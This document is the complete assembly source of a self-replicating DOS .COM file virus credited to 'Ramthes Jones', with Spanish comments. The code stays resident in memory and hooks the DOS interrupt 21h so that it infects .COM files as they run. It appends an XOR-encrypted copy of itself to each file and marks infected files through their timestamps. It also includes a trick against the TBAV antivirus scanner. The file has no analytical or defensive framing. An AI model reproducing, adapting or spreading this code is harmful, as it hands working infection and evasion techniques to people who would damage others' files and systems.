;******************************************************************************
;******************************************************************************
;****		   Virus: .COM /noTBAV					   ****
;****					 By: Ramthes Jones		   ****
;******************************************************************************
;******************************************************************************
CODE	SEGMENT

	ASSUME	CS:CODE, DS:CODE, ES:CODE, SS:CODE
	ORG	0100h

DELTA	EQU	(TWO - ONE)

START:
	JMP	VIR_START
	NOP
	MOV	AH,09h
	MOV	DX,OFFSET MSG
	PUSH	CS
	POP	DS
	INT	21h

	INT	20h

MSG	DB 0Ah,0Dh,'Virus Mr-X activado!!!',0Ah,0Dh
	DB 'Por favor no ejecute ningun archivo. Je, je, je...',0Ah,0Dh,'$'

VIR_START:
ONE	LABEL	BYTE
	MOV	BX,015Dh
	PUSH	BX
	MOV	SI,(OFFSET BEGIN - OFFSET ONE) - 1; Conocido
	ADD	SI,BX
	MOV	CX,(OFFSET TWO - OFFSET BEGIN) + 1; Conocido
	MOV	DX,0FFCDh			  ; FFCD = INT FFh
	CLI
BUCLE:
	MOV	AH,[SI]
	XOR	AH,00h
	DB	06 DUP (90h)
	MOV	[bx+30],DX

INTFFh	LABEL	WORD
	MOV	[SI],AH
	MOV	[bx+30],2488h
	INC	SI
	LOOP	BUCLE

	STI
	JMP	ATBV

JODER:
	MOV	AH,4Ch
	INT	21h

ATBV:
	MOV	AH,30h
	INT	21h

BEGIN:
	MOV	AX,0ACACh
	INT	21h
	CMP	AX,0CACAh
	JE	RUN_COM
	JMP	STAY_IN_MEMO

RUN_COM:
	PUSH	CS
	PUSH	CS
	POP	DS
	POP	ES
	POP	BX
	MOV	DI,100h
	LEA	SI,[(NORMAL - OFFSET ONE) + BX]
	MOVSW
	MOVSB
	PUSH	CS
	PUSH	0100h
	RETF

STAY_IN_MEMO:
	MOV	AH,4Ah
	XOR	BX,BX
	INT	21h

	MOV	AH,4Ah
	MOV	BX,0FFFFh
	INT	21h

	SUB	BX,61h	;101h
	MOV	AH,4Ah
	INT	21h

	MOV	AH,48h
	MOV	BX,60h ;100h
	INT	21h

	MOV	ES,AX
	PUSH	ES
	DEC	AX
	MOV	ES,AX
	MOV	ES:WORD PTR [0001h], 0008h
	POP	ES

	PUSH	CS
	POP	DS

	POP	SI
	PUSH	SI
	XOR	DI,DI
	MOV	CX,DELTA
	CLD
	REP	MOVSB

	PUSH	ES
	POP	DS

	MOV	AX,3521h
	INT	21h
	POP	SI
	PUSH	SI
	MOV	DS:[INT21IP - OFFSET ONE],BX
	MOV	DS:[INT21CS - OFFSET ONE],ES

	MOV	AX,2521h
	MOV	DX,(OFFSET HOOK_21 - OFFSET ONE)
	INT	21h
	JMP	RUN_COM

HOOK_21 PROC FAR
	PUSH	DS
	PUSHF
	PUSH	AX
	PUSH	BX
	PUSH	CX
	PUSH	DX
	PUSH	SI
	PUSH	DI
	PUSH	DS
	PUSH	ES

	CMP	AX,4B00h
	JE	INFECT_COM
	CMP	AX,0ACACh
	JE	GIVE_MARK
	JMP	FIN

GIVE_MARK:
	POP	ES
	POP	DS
	POP	DI
	POP	SI
	POP	DX
	POP	CX
	POP	BX
	POP	AX
	POPF
	POP	DS
	MOV	AX,0CACAh
	IRET

INFECT_COM:
	PUSH	AX
	PUSH	BX
	PUSH	DX
	PUSH	DS
	PUSH	ES

	MOV	AX, CS
	MOV	DS, AX
	MOV	AX,3524h
	PUSHF
	CALL	DWORD PTR DS:[INT21IP - OFFSET ONE]
	MOV	DS:[INT24IP - OFFSET ONE],BX
	MOV	DS:[INT24CS - OFFSET ONE],ES

	MOV	AX,2524h
	MOV	DX,(OFFSET HOOK_24 - OFFSET ONE)
	PUSHF
	CALL	DWORD PTR DS:[INT21IP - OFFSET ONE]
	POP	ES
	POP	DS
	POP	DX
	POP	BX
	POP	AX

	PUSH	DX

	MOV	AX,4300h
	PUSHF
	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]
	MOV	CS:[(ATRIBUTOS - OFFSET ONE)],CX

	MOV	AX,4301h
	MOV	CX,20h
	PUSHF
	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]
	JC	FINAL_1

	MOV	AX,3D02h
	PUSHF
	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]
	PUSH	AX
	POP	BX

	MOV	AH,3Fh
	MOV	CX,2
	PUSH	CS
	POP	DS
	MOV	DX,(OFFSET NORMAL - OFFSET ONE)
	PUSHF
	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]

	XOR	SI,SI
	mov	ax,cs:(normal - offset one)[si]
	cmp	ax,'ZM'
	je	final_1
	jmp	conti

FINAL_1:
	JMP	FINAL

CONTI:
	MOV	AX,5700h
	PUSHF
	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]
	MOV	CS:[(HORA - OFFSET ONE)],CX
	MOV	CS:[(FECHA - OFFSET ONE)],DX

	AND	CL,00011111b	; Esto es lo correcto para comprobar
	CMP	CL,00001101b	;  si los segundos son 26
	JE	FINAL_1

	XOR	AL,AL
	CALL	F_42h

	MOV	AH,3Fh
	MOV	CX,3
	PUSH	CS
	POP	DS
	MOV	DX,(OFFSET NORMAL - OFFSET ONE)
	PUSHF
	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]

	MOV	AL,02h
	CALL	F_42h
	PUSH	AX

	SUB	AX,3

	MOV	SI,1
	MOV	CS:(BUFFER - OFFSET ONE)[SI],AL
	INC	SI
	MOV	CS:(BUFFER - OFFSET ONE)[SI],AH

	PUSH	BX
	MOV	AH,48h
	MOV	BX,150h
	PUSHF
	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]
	MOV	ES,AX
	POP	BX

	PUSH	CS
	POP	DS

	XOR	SI,SI
	MOV	DI,SI
	MOV	CX,OFFSET TWO - OFFSET ONE
	CLD
	REP	MOVSB

	PUSH	ES
	POP	DS

	POP	AX			; Calculo
	INC	AH			; la direccion
	XOR	SI,SI			; donde va a
	MOV	[SI + 1],AL		; comenzar el
	MOV	[SI + 2],AH		; arch infectado

	MOV	AH,2Ch
	PUSHF
	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]
	MOV	[SI+20],DL

	MOV	CX,(OFFSET TWO - OFFSET BEGIN) + 1
	MOV	SI,(OFFSET BEGIN - OFFSET ONE) - 1
ENCRIPTO:
	XOR	ES:[SI],DL
	INC	SI
	LOOP	ENCRIPTO

	MOV	AH,40h
	MOV	CX,DELTA
	XOR	DX,DX
	PUSH	ES
	POP	DS
	PUSHF
	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]
	JC	FINAL

	MOV	AH,49h
	PUSHF
	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]

	XOR	AL,AL
	CALL	F_42h

	MOV	AH,40h
	MOV	CX,3
	MOV	DX,(OFFSET BUFFER - OFFSET ONE)
	PUSH	CS
	POP	DS
	PUSHF
	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]

	MOV	AX,5701h
	MOV	CX,CS:[(HORA - OFFSET ONE)]
	AND	CL,11100000b
	OR	CL,00001101b
	MOV	DX,CS:[(FECHA - OFFSET ONE)]
	PUSHF
	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]
FINAL:
	MOV	AH,3Eh
	PUSHF
	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]

	MOV	AX,4301h
	MOV	CX,CS:[(ATRIBUTOS - OFFSET ONE)]
	POP	DX
	PUSHF
	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]

	MOV	AX,2524h
	MOV	DX,CS:[INT24IP - OFFSET ONE]
	MOV	DS,CS:[INT24CS - OFFSET ONE]
	PUSHF
	CALL	DWORD PTR CS:[INT21IP-OFFSET ONE]

FIN:
	POP	ES
	POP	DS
	POP	DI
	POP	SI
	POP	DX
	POP	CX
	POP	BX
	POP	AX

	POPF
	POP	DS
	JMP	DWORD PTR CS:[(INT21IP - OFFSET ONE)]

F_42h	PROC
	MOV	AH,42h
	CWD
	MOV	CX,DX
	PUSHF
	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]
	RET
F_42h	ENDP

HOOK_21 ENDP

HOOK_24 PROC
	XOR	AL,AL
	IRET
HOOK_24 ENDP

INT21IP 	DW 0
INT21CS 	DW 0
INT24IP 	DW 0
INT24CS 	DW 0
INT17IP 	DW 0
INT17CS 	DW 0
ATRIBUTOS	DW 0
HORA		DW 0
FECHA		DW 0
BUFFER		DB 3 DUP(0E9h)
NORMAL		DB 3 DUP(90h)
HIDDEN_MSG	DB "Ramthes. World Cup'98: ARGENTINA!!"
TWO	LABEL	BYTE
CODE	ENDS
        END     START